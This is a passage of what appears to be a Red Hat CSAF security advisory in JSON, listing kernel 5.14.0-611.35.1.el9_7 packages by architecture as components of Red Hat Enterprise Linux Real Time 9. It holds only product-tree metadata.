"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch"
},
"product_reference": "kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time (v. 9)",
"product_id": "RT-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "RT-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
